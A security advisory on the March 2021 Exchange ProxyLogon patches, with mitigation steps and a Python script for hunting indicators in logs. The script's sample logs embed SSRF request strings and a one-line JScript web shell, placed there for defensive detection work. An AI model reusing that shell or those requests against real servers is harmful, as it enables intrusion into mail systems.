Microsoft Issues Out-of-Band Patches for Exchange Server ProxyLogon Zero-Days
Microsoft released emergency security updates on March 2, 2021 to fix four Exchange Server zero-days (ProxyLogon) actively exploited by the HAFNIUM group, urging on-premises operators worldwide to patch or isolate impacted servers immediately.
Executive briefing: Microsoft published out-of-band security updates on March 2, 2021 for Microsoft Exchange Server 2013, 2016, and 2019 following active exploitation of a chain of zero-days dubbed ProxyLogon. The HAFNIUM threat actor used a server-side request forgery bug to authenticate to an Exchange server as the server itself, then chained post-authentication deserialization and arbitrary file write bugs to run code as SYSTEM and drop web shells across tens of thousands of on-premises Exchange deployments.
Critical vulnerabilities
- CVE-2021-26855. SSRF in the Exchange front end (Client Access services) that lets an unauthenticated attacker send arbitrary HTTP requests to back-end endpoints and authenticate as the Exchange server; this is the entry point that turns the post-authentication bugs below into an unauthenticated chain.
- CVE-2021-26857. Insecure deserialization in the Unified Messaging service; code runs as SYSTEM.
- CVE-2021-26858 and CVE-2021-27065. Post-authentication arbitrary file write bugs used to drop web shells (for example by pointing an OAB virtual directory's ExternalUrl at script content and writing it to disk) once the SSRF has supplied the authentication.
- Mass exploitation. Attackers exfiltrated mailboxes and credential material and used defense-evasion techniques against Microsoft Defender; automated exploitation by additional actors was observed within hours of disclosure.
Operational guidance
- Immediately apply the March 2021 Security Update that matches the Cumulative Update level of each server. Microsoft also published Security Updates for several older, out-of-support CUs so that operators can close the hole before moving to a supported CU; an SU for a different CU level will not install. Afterwards, assume any credential the server held (service accounts, cached admin logons) may have been captured and revoke or rotate it.
- Until the update is installed, run Microsoft's Exchange On-Premises Mitigation Tool (EOMT.ps1), which applies an IIS URL Rewrite mitigation for CVE-2021-26855 and runs the Microsoft Safety Scanner to remove known web shells; it is a stopgap, not a replacement for the Security Update. Use HealthChecker.ps1 to confirm the installed build is patched, and Test-ProxyLogon.ps1 to scan the server's logs for exploitation indicators.
- Hunt for the published indicators (HttpProxy log entries whose AnchorMailbox value has the form ServerInfo~*/*, ECP Server log entries that set a virtual directory's ExternalUrl to script content, and unexpected .aspx files under inetpub\wwwroot\aspnet_client and FrontEnd\HttpProxy\owa\auth) using Microsoft's published queries, and use CISA Alert AA21-062A for additional detection analytics.
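The log checks above, as an added example that is not Microsoft's code: a portable Python re-implementation of two of the indicator checks performed by Microsoft's Test-ProxyLogon.ps1, so they can be run off-box against copied logs or in a SIEM pipeline. It assumes the HttpProxy logs (normally under %ExchangeInstallPath%Logging\HttpProxy) carry a `#Fields:` header declaring their CSV columns, which the parser keys on, and that the ECP Server logs (Logging\ECP\Server) can be grepped line by line. The two sample logs are constructed and abbreviated to the columns relevant here; real files carry many more columns, which the header-driven parser tolerates.

```python
"""Offline hunt for two Microsoft-published ProxyLogon log indicators.

Added example, not Microsoft's Test-ProxyLogon.ps1. Log samples are constructed.
"""
from __future__ import annotations

import csv
import re

# CVE-2021-26855 (SSRF): when the front end is abused to reach a back end, the
# HttpProxy log's AnchorMailbox column holds "ServerInfo~<backend>/<path>".
# Equivalent to the PowerShell wildcard test  AnchorMailbox -like 'ServerInfo~*/*'.
ANCHOR_SSRF = re.compile(r"^ServerInfo~.*/")

# CVE-2021-27065 (arbitrary file write): an ECP Server log entry that sets a
# virtual directory's ExternalUrl to a value containing a server-side script tag.
ECP_VDIR_SCRIPT = re.compile(
    r"Set-\w*VirtualDirectory.*ExternalUrl.*<script", re.IGNORECASE
)

# Constructed, abbreviated HttpProxy log. Hosts and addresses are documentation values.
SAMPLE_HTTPPROXY_LOG = """#Software: Microsoft Exchange Server
#Version: 15.01.2176.009
#Log-type: HttpProxy Logs
#Date: 2021-03-03T00:00:00.000Z
#Fields: DateTime,ClientIpAddress,UrlStem,AnchorMailbox,HttpStatus,UserAgent
2021-03-03T01:12:04.101Z,198.51.100.17,/owa/auth/logon.aspx,,200,Mozilla/5.0
2021-03-03T01:12:09.388Z,203.0.113.44,/ecp/y.js,ServerInfo~a]@mail.example.com:444/autodiscover/autodiscover.xml?#,200,python-requests/2.25.1
2021-03-03T01:12:11.042Z,203.0.113.44,/ecp/DDI/DDIService.svc/SetObject,ServerInfo~a]@mail.example.com:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=ABCDEF,200,python-requests/2.25.1
2021-03-03T01:13:55.900Z,192.0.2.9,/ews/exchange.asmx,user@example.com,200,Microsoft Office/16.0
"""

# Constructed, abbreviated ECP Server log: one benign Get, one malicious Set that
# writes a script into the OAB virtual directory's ExternalUrl, one legitimate Set.
SAMPLE_ECP_SERVER_LOG = """#Software: Microsoft Exchange Server
#Log-type: ECP Server Log
#Fields: DateTime,ClientIpAddress,Cmd
2021-03-03T01:12:10.500Z,203.0.113.44,S:CMD=Get-OabVirtualDirectory
2021-03-03T01:12:11.200Z,203.0.113.44,S:CMD=Set-OabVirtualDirectory.ExternalUrl='http://f/<script language='JScript' runat='server'>function Page_Load(){eval(Request['cmd'],'unsafe');}</script>'
2021-03-03T01:12:12.000Z,203.0.113.44,S:CMD=Set-OabVirtualDirectory.ExternalUrl='https://mail.example.com/OAB'
"""


def parse_exchange_log(text: str) -> list[dict[str, str]]:
    """Parse an Exchange CSV log whose columns are declared by a '#Fields:' line.

    Other '#'-prefixed header lines (Software, Version, Log-type, Date) are skipped,
    and each data row is returned as a dict keyed by column name.
    """
    fields: list[str] | None = None
    rows: list[dict[str, str]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = [f.strip() for f in line[len("#Fields:"):].split(",")]
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data row encountered before a #Fields: header")
        values = next(csv.reader([line]))
        rows.append(dict(zip(fields, values)))
    return rows


def find_ssrf_requests(rows: list[dict[str, str]]) -> list[dict[str, str]]:
    """Rows whose AnchorMailbox shows the CVE-2021-26855 ServerInfo~ pattern."""
    return [r for r in rows if ANCHOR_SSRF.search(r.get("AnchorMailbox", ""))]


def find_vdir_script_writes(lines: list[str]) -> list[str]:
    """ECP Server log lines that set a VirtualDirectory ExternalUrl to script content."""
    return [line for line in lines if ECP_VDIR_SCRIPT.search(line)]


def hunt(httpproxy_text: str, ecp_server_text: str) -> dict:
    """Run both checks and summarise: hit counts, SSRF source IPs, and whether
    the SSRF-then-file-write chain was seen in the same log set."""
    ssrf = find_ssrf_requests(parse_exchange_log(httpproxy_text))
    writes = find_vdir_script_writes(ecp_server_text.splitlines())
    return {
        "ssrf_hits": len(ssrf),
        "ssrf_source_ips": sorted({r["ClientIpAddress"] for r in ssrf}),
        "vdir_script_writes": len(writes),
        "chain_observed": bool(ssrf) and bool(writes),
    }


if __name__ == "__main__":
    print(hunt(SAMPLE_HTTPPROXY_LOG, SAMPLE_ECP_SERVER_LOG))
```

The source IPs returned by `hunt()` are the ones to pivot on next (other front-end logs, firewall, and web-shell file creation times); a ServerInfo~ hit alone proves the SSRF was exercised, while a hit together with a script-bearing ExternalUrl write means the server should be treated as compromised, not merely vulnerable.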